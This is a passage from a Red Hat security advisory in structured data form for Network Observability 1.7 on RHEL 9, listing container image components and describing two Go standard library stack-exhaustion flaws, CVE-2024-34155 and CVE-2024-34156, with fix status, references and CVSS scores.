"network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, ], }, vulnerabilities: [ { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: "https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the 